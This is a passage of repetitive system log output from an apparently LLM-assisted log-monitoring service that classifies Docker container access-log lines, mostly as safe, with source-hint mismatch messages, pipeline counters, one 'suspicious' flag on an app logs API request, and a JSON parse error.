"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:24.767101 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:39:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:24.767138 [analyzer] Source hint mismatch: LLM says "docker container access logs (app/http)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:26.095748 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:39:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:26.095780 [analyzer] Source hint mismatch: LLM says "docker 
container (captain-captain service) / application access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:28.074089 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:39:28 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:28.074123 [analyzer] Source hint mismatch: LLM says "docker-captain web/app container access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:30.792110 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:39:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:30.792146 [analyzer] Source hint mismatch: LLM says "docker web/app container access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:33.883460 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:33.883497 [analyzer] Source hint mismatch: LLM says "docker:container http access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.163227 [observer] Pipeline: processed=743 pattern_hits=403 llm_calls=339 llm_errors=5 learned=1 Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.163250 [observer] Patterns: hash=403 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=340 Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.693285 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:36.693323 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:39.822238 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:39.822274 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:42.986341 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:39:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:42.986376 [analyzer] Source hint mismatch: LLM says "docker containerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:45.778097 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix Mar 19 22:39:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:45.778135 [analyzer] Source hint mismatch: LLM says "docker/captain container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:48.812531 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow 
pattern_type=prefix Mar 19 22:39:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:48.812566 [analyzer] Source hint mismatch: LLM says "docker/captain web API (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:51.808278 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:39:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:51.808312 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:54.734283 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:39:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:54.734320 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / app HTTP access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:39:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:57.649209 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:39:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:57.649245 [analyzer] Source hint mismatch: LLM says "docker/captain (container web/API access logs)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:00.774659 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:40:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:00.774695 
[analyzer] Source hint mismatch: LLM says "docker container access log / web API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:03.845270 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix Mar 19 22:40:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:03.845308 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (app HTTP access logging)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.164064 [observer] Pipeline: processed=767 pattern_hits=417 llm_calls=349 llm_errors=5 learned=1 Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.164090 [observer] Patterns: hash=417 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=350 Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.756956 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:40:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:06.756991 [analyzer] Source hint mismatch: LLM says "docker/captain container access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.826245 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.826278 [analyzer] Source hint mismatch: LLM says "docker container access log (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.894456 [analyzer] LLM 
verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.90 action=allow pattern_type=prefix Mar 19 22:40:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:09.894501 [analyzer] Source hint mismatch: LLM says "nginx (access log via docker)", actual is "captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo" — skipping pattern Mar 19 22:40:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:12.897577 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.80 action=allow pattern_type=prefix Mar 19 22:40:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:12.897627 [analyzer] Source hint mismatch: LLM says "docker container (application web server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:15.780436 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:40:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:15.780473 [analyzer] Source hint mismatch: LLM says "docker/captain-web (access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:18.651100 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.42 action=suppress pattern_type=prefix Mar 19 22:40:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:18.651135 [analyzer] Source hint mismatch: LLM says "docker container web access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:21.726034 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.62 action=alert pattern_type= Mar 19 
22:40:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:21.726069 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP GET to /api/v2/.../logs with encoding=hex may indicate log/telemetry retrieval; not clearly malicious but unusual enough to warrant scrutiny. Line=2026-03-19T22:40:20.602478056Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 21.155 ms - - Mar 19 22:40:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:24.945488 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:40:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:24.945537 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:26.193005 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:40:26 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:26.193040 [analyzer] Source hint mismatch: LLM says "docker container web/app access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:27.794497 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:40:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:27.794537 [analyzer] Source hint mismatch: LLM says "docker/captain web/API container (reverse proxy or app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:33.962928 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe 
confidence=0.86 action=allow pattern_type=prefix Mar 19 22:40:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:33.962963 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (captain app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:36.162968 [observer] Pipeline: processed=793 pattern_hits=433 llm_calls=359 llm_errors=5 learned=1 Mar 19 22:40:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:36.162991 [observer] Patterns: hash=433 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=360 Mar 19 22:40:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:42.766719 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:40:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:42.766757 [analyzer] Source hint mismatch: LLM says "docker/captain container access logs (web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:45.877313 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:40:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:45.877354 [analyzer] Source hint mismatch: LLM says "docker/captain container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:48.590367 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:40:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:48.590418 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app HTTP access logs via container)", actual is 
"captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.816982 [llm] Failed to parse verdict from: { Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "classification": "safe", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "confidence": 0.78, Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "reason": "Appears to be a normal HTTP GET request to an application logs endpoint with a 304 status and routine latency.", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "action": "allow", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "pattern_type": "prefix", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "pattern": "GET /api/v2/user/apps/appData/api/logs?encoding=hex", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "source_hint": "docker-captain web service access log", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "variable_fields": [ Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: { Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "token": "2026-03-19T22:40:50.605577419Z", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "type": "timestamp", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: { Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "token": "304", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "type": "request_id", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: }, Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: { Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "token": "21.852 ms", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "type": "duration", Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: "replacement": "" Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: } Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 
] Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: } Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.817030 [analyzer] LLM error for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: parsing verdict: invalid character '\x1b' in string literal Mar 19 22:40:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:51.817040 [LLM_ERROR] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Line=2026-03-19T22:40:50.605577419Z GET /api/v2/user/apps/appData/api/logs?encoding=hex 304 ... Mar 19 22:40:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:54.729935 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:40:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:54.729975 [analyzer] Source hint mismatch: LLM says "docker container access log (application/API server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:40:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:57.850733 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:40:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:40:57.850769 [analyzer] Source hint mismatch: LLM says "docker container access logs / reverse proxy (e.g., app/http server)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:00.900153 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:00.900217 [analyzer] Source hint mismatch: LLM says "docker:captain-captain (web app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:03 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:41:03.823257 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:41:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:03.823300 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.163113 [observer] Pipeline: processed=816 pattern_hits=447 llm_calls=368 llm_errors=6 learned=1 Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.163139 [observer] Patterns: hash=447 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=369 Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.665301 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:06.665335 [analyzer] Source hint mismatch: LLM says "docker http access log (app behind container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:09.750694 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:09.750731 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log (app/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:12.924904 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains Mar 19 22:41:12 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:41:12.924944 [analyzer] Source hint mismatch: LLM says "docker/captain (containerized web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:15.884606 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:15.884643 [analyzer] Source hint mismatch: LLM says "docker container access logger / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:18.867866 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:41:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:18.867905 [analyzer] Source hint mismatch: LLM says "dockerized web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:21.757341 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:41:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:21.757379 [analyzer] Source hint mismatch: LLM says "docker container (app web/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:24.775624 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:41:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:24.775681 [analyzer] Source hint mismatch: LLM says "docker container access log (web/API)", 
actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:25.868570 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:25.868622 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web application access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:27.841681 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:27.841731 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) likely serving an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:31.023680 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:41:31 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:31.023718 [analyzer] Source hint mismatch: LLM says "docker/captain container web access log (API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:33.707603 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 19 22:41:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:33.707657 [analyzer] Source hint mismatch: LLM says "docker/captain web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 
22:41:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:36.162952 [observer] Pipeline: processed=841 pattern_hits=461 llm_calls=379 llm_errors=6 learned=1 Mar 19 22:41:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:36.162977 [observer] Patterns: hash=461 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=1 misses=380 Mar 19 22:41:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:37.054484 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:41:37 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:37.054519 [analyzer] Source hint mismatch: LLM says "docker container reverse proxy / application access logger", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:39.758006 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix Mar 19 22:41:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:39.758043 [analyzer] Source hint mismatch: LLM says "docker", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:42.833821 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:41:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:42.833858 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (web/API container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:45.838658 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:41:45 ip-172-26-12-110 
observer[1561913]: 2026/03/19 22:41:45.838689 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:48.856553 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix Mar 19 22:41:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:48.856588 [analyzer] Source hint mismatch: LLM says "docker container reverse-proxy/app logs endpoint", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:51.907954 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix Mar 19 22:41:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:51.907992 [analyzer] Source hint mismatch: LLM says "docker container access logger (HTTP API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:54.830939 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix Mar 19 22:41:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:54.830979 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 19 22:41:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:57.588206 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix Mar 19 22:41:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:41:57.588237 [analyzer] Source hint mismatch: LLM says "docker (containerized 
